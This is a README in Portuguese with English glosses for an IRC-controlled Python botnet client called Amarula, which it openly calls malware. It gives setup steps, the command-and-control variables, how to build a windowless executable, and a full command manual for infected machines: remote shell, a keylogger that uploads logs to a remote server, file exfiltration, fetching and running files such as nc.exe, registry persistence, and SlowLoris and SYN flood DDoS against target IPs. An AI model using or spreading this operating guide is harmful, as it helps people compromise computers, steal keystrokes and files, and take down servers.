Botnet client feito em Python 2.7 (written in Python 2.7)
Testado em: Windows XP, 8, 10, (tested on)
Escrito por: Carlos Néri Correia (coded by)
Versão: 2.1 (version)

O Amarula IRC Botnet é um botnet client codado em Python 2.7. O malware nada mais é do que um cliente IRC, especialmente construído, que se conecta a um server IRC e entra em um canal como se fosse um usuario comum. O Administrador, por sua vez, também estará conectado ao canal, mas através de um programa de cliente IRC normal (como o Hexchat), de forma que, toda vez que o Adm envia uma mensagem para o canal, o BOT interpreta essa mensagem como um comando a ser executado no sistema. São diversas as vantagens de administrar os BOTs através do IRC - Os servers são ativos 24h, não é necessário abrir portas no PC, o IRC é um protocolo teoricamente confiável, entre outras.

• Executar comandos shell (shell command execution)
  
• Keylogger - Captura de teclas digitadas pelo cliente em tempo real (real-time keylogging)
  
• Listar diretório atual do bot (list current working directory)
  
• Listar todos os arquivos de um diretorio (list all directory files)
  
• Obter ip local e externo do bot (get local and WAN bot IP)
  
• Download de arquivos da web via HTTP (HTTP web downloading)
  
• Upload de arquivos para servidor web via HTTP (upload bot files to web server)
  
• Envio de logs para servidor remoto (send logs to remote server)
  
• Deletar arquivos no BOT (delete files)
  
• Executar arquivos no BOT (run files)
  
• Persistência (persistence)
  
• Ataques DDoS na camada 7 (layer 7 DDoS attacks)
  
• Ataques DDoS na camada 4 (layer 4 DDoS attacks)
  

Faça o download do ZIP ou clone o repositório:

$ git clone https://github.com/hackerama/Amarula-Python-Botnet.git

Algumas bibliotecas do python são requeridas:

$ pip install requests
$ pip install pypiwin32

A biblioteca pyHook, também é exigida. abaixo o link para baixar o executável de instalação.

Download pyHook https://sourceforge.net/projects/pyhook/

Algumas variáveis precisarão ser definidas ou alteradas, para que a conexão do BOT com o IRC seja feita corretamente.
Toda a administração dos BOTs será feita através de um cliente IRC. O Administrador enviará comandos para o canal onde os BOTs estarão conectados e intrepretarão as mensagens enviadas como comandos.

VARIÁVEIS: (variables)

ircServer (sets IRC server address)
Endereço do servidor IRC ao qual o BOT irá se conectar.

ircPwdCha (sets IRC channel password)
Define o password do canal IRC ao qual o bot irá se conectar.
Caso o canal não possua password, deixar em branco ("")
Importante setar um password no canal para que outras pessoas não entrem e possam controlar os seus bots.

ircChanne (sets IRC channel)
Canal do IRC ao qual o bot irá se conectar.
É interpretando as mensagens enviadas para o canal que o BOT irá executar os comandos internamente no cliente.

botPass (sets password to activate and connect to the BOTS)
Define um passoword para ativar, conectar e controlar os bots no canal

botAdmi (Admin Name - NOT OBLIGATORY)
Define um nome pelo qual os zumbis te chamarão
Não é obrigatório.

urlUpload (Upload page on remote server)
Página de upload no servidor remoto, para a função de envio remoto.
Será criado um arquivo capt-(nome do PC).txt na mesma pasta de upload.php, no servidor.

ldir (sets local directory, dropping directory)
Diretório local, onde será salvo o arquivo de log.
Diretório para o qual o .exe se copia para ser executado em persistência quando a máquina reiniciar.

$ pyinstaller -w amarula.py --onefile

• [login] para se conectar aos BOTS no canal
  A senha padrão é "raise".

    $ USAGE: login <senha> br>
    $ Ex: login raise
  

• [help] para listar os comandos disponíveis
  

    $ USAGE: help <botnick> <br>
    $ Ex: help DESKTOP-PC-3456
  

• [dir] para vizualizar o diretorio atual do zumbi
  

    $ USAGE: ls <botnick> <br>
    $ Ex: ls DESKTOP-PC-3456
  

• [ls] para listar o conteudo da pasta atual
  

    $ USAGE: ls <botnick> <br>
    $ Ex: ls DESKTOP-PC-3456
  

• [ip] para mostrar os ips do bot

    $ USAGE: ls <botnick> 
    $ Ex: ip DESKTOP-PC-3456
  

• [upload] para fazer upload de arquivos do bot Será feito o upload para o servidor web definido na variável urlUpload

    $ USAGE: $ USAGE: upload <Arquivo> <botnick>
    $ Ex: upload leak.txt DESKTOP-PC-3456
  

• [download] para baixar arquivos da web para o zumbi

    $ USAGE: $ USAGE: download <link> <botnick>
    $ Ex: download http://seusite.com/nc.exe DESKTOP-PC-3456
  

• [run] para executar um programa ou arquivo

    $ USAGE:  run <programa> <botnick>
    $ Ex: run calc.exe DESKTOP-PC-3456
  

• [delete] para excluir arquivos

    $ USAGE: delete <arquivo> <botnick>
    $ Ex: delete leak.txt DESKTOP-PC-3456
  

• [keylog start] para ativar o keylogger
  O arquivo de log será upado para o servidor web a cada 100 caracteres digitados.
  Será iniciado um novo processo no sistema do BOT para o keylogger.

    $ USAGE: keylog start <botnick>
    $ Ex: keylog start DESKTOP-PC-3456
    $ Ex: keylog start wave 
  

• [keylog stop] para desativar o keylogger

    $ USAGE: keylog stop <botnick>
    $ Ex: keylog stop DESKTOP-PC-3456
    $ Ex: keylog stop wave
  

• [slow start] para ativar o ataque SlowLoris
  Ataque DDoS à camada 7 de servidores web com o SlowLoris.

    $ USAGE: slow start <socket count> <ip> <port> [<botnick> || <wave>]
    $ Ex: slow start 700 206.285.1.23 80 DESKTOP-PC-3456
    $ Ex: slow start 700 206.285.1.23 80 wave
  

• [slow stop] para desativar o SlowLoris

    $ USAGE: slow stop <botnick> || wave
    $ Ex: slow stop DESKTOP-PC-3456
    $ Ex: slow stop wave
  

• [plum start] para ativar o ataque Syn Flood
  Ataque DDoS à camada 4 de servidores com o Plum.

    $ USAGE: plum start <threads> <ip> <port> [<botnick> || <wave>]
    $ Ex: plum start 10 206.285.1.23 80 DESKTOP-PC-3456
    $ Ex: plum start 10 206.285.1.23 80 wave
  

• [plum stop] para desativar o Syn Flood

    $ USAGE: plum stop <botnick> || wave
    $ Ex: plum stop DESKTOP-PC-3456
    $ Ex: plum stop wave
  

• [persistence] para instalar persistencia no registro do Windows Instala a persistencia, iniciando o bot toda vez que o PC do cliente iniciar
  

    $ USAGE: persistence <botnick>
    $ Ex: persistence DESKTOP-PC-3456
  

• [shell] para executar comandos no terminal.

    $ USAGE: shell <comando> <botnick>
    $ Ex: shell echo HACKED hack.txt && DIR hack.txt DESKTOP-PC-3456
  

• [sair] para que os bots ativos saiam do canal
  

    $ USAGE: sair		
  

• [sair] matar todos os BOTs ativos
  Todos os zumbis ativos desconectam-se do IRC

    $ USAGE: matar		
  

https://youtu.be/yYqAwiaAgrA